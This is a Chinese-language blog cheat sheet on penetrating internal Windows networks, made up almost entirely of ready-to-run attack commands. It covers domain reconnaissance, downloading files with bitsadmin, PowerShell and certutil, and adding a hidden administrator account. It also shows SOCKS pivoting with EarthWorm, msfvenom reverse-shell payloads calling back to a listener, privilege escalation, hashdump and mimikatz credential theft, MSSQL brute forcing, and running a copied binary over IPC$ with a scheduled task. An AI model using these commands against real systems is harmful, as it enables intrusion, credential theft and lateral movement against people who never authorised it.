内网渗透小记


常用一句话webshell

https://github.com/tennc/webshell

信息收集


dnscmd <servername> /ZonePrint <zonename>  查看dns列表(DC执行)
tasklist /SVC   查看系统进程及其描述
query user || qwinsta 查看当前在线用户
net user  查看本机用户
net user /domain 查看域用户
net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多
net view /domain 查看有几个域
net view \\\\dc   查看 dc 域内共享文件
net group /domain 查看域里面的组
net group "domain admins" /domain 查看域管
net localgroup administrators /domain   /这个也是查域管,是升级为域控时,本地账户也成为域管
net group "domain controllers" /domain 域控
net time /domain 
net config workstation   当前登录域 - 计算机名 - 用户名
net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机,可访问资源
ipconfig
systeminfo
tasklist /svc   详细进程信息
tasklist /S ip /U domain\username /P /V 查看远程计算机 tasklist
taskkill /im  imagename  /f  结束进程
net localgroup administrators && whoami 查看当前是不是属于管理组
netstat -ano
nltest /dclist:xx  查看域控
nltest /domain_trusts   查看域信任信息
whoami /all 查看 Mandatory Label uac 级别和 sid 号
net sessoin 查看远程连接 session (需要管理权限)
net share     共享目录
cmdkey /l   查看保存登陆凭证
echo %logonserver%  查看登陆域
spn –l administrator spn 记录
set  环境变量
dsquery server - 查找目录中的 AD DC/LDS 实例
dsquery user - 查找目录中的用户
dsquery computer 查询所有计算机名称 windows 2003
dir /s *.exe 查找指定目录下及子目录下没隐藏文件
arp -a
tracert  查路由

windows 下载文件

  • bitsadmin

    download文件
    bitsadmin /transfer n https://www.baidu.com/robots.txt c:\1.txt
    
  • powershell

    一条命令download文件
    powershell (new-object System.Net.WebClient).DownloadFile('https://www.baidu.com/robots.txt','C:\1.txt')
    多条命令download文件
    $client = new-object System.Net.WebClient
    $client.DownloadFile('https://www.baidu.com/robots.txt', 'C:\1.txt')
    
  • certutil.exe

    cmd.exe /c certutil.exe -urlcache -split -f https://www.baidu.com/robots.txt
    

添加删除用户操作

  • net user admin1 P@ssw0rd /add & net localgroup administrators admin1 /add    添加用户并设置管理员
    net user admin1 /del
    

内网代理工具

EW

tools:
http://rootkiter.com/EarthWorm
正向:
被攻击机(跳板):

./ew_for_Linux -s ssocksd -l 9999 (侦听 0.0.0.0:9999)
netstat -pantu|grep 9999 (查看是否侦听成功)

攻击机:

proxychain 设置 socks5 为跳板 ip port
proxychain nmap 即可以用跳板代理扫描其他主机

netsh Windows 自带工具 windows 端口转发

netsh interface portproxy add v4tov4  listenaddress=0.0.0.0 listenport=53 connectaddress=10.10.10.4  connectport=8880
netsh interface  portproxy show  v4tov4
netsh interface portproxy delete v4tov4  listenaddress=0.0.0.0 listenport=53  

MSF反弹 shell

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

1.生成一个回连木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.111 LPORT=443 -f dll>/root/Desktop/443.dll

2.生成木马后,我们在菜刀里放入生成的木马,运行,同时打开msf准备回连

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.111
set lport 443
run

4.提权

background 或 ctrl+z

use exploit/windows/local/ms11_080_afdjoinleaf
set session 1
run
hashdump //密码获取
load mimikatz //使用mimikatz
kerberos //查看解密

5.新加路由查看子网

route
background
sessions
route add 192.168.2.0 255.255.255.0 2
search mssql //找mssql模块
use auxiliary/scanner/mssql/mssql_login //使用login模块

show options

set rhosts 192.168.177.1/24

set password sa@123
run
show options
set BEUTEFORCE_SPEED 0
run

端口扫描search portscan

use auxiliary/scanner/portscan/tcp //使用scanner模块
show options
set RHOSTS 192.168.2.0/24
set ports 139,445,3389 //设置扫描端口

ipc$

D:>net use \192.168.1.254\c$ “pwd” /user:user //连接192.168.1.254的IPC$共享,用unc路径
D:>copy srv.exe \192.168.1.254\c$ //复制本地 srv.exe 到C根目录
D:>net time \192.168.1.254 //查时间
D:>at \192.168.1.254 10:50 srv.exe //用at命令在10点50分启动 srv.exe
D:>net use \192.168.1.254\c$ /del


文章作者: yaron
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yaron !
 上一篇
开源工具DotNetToJScript详细编译教程 开源工具DotNetToJScript详细编译教程
0x00 介绍James Forshaw开源了一个工具DotNetToJScript,能够利用JS/Vbs脚本加载.Net程序,这是一款可以将 .net 程序转换为 jscript 代码的工具。 工具下载:下载地址
下一篇 
免杀 MSF Windows Payload 的方法与实践(小白视角) 免杀 MSF Windows Payload 的方法与实践(小白视角)
MSF 是当下最流行的渗透测试平台,在进行后渗透阶段往往需要我们绕过杀软等隐蔽操作,在看完余弦猥琐流打发之后,自个手动实践,然后写一个详细的演练操作,做笔记存档。
  目录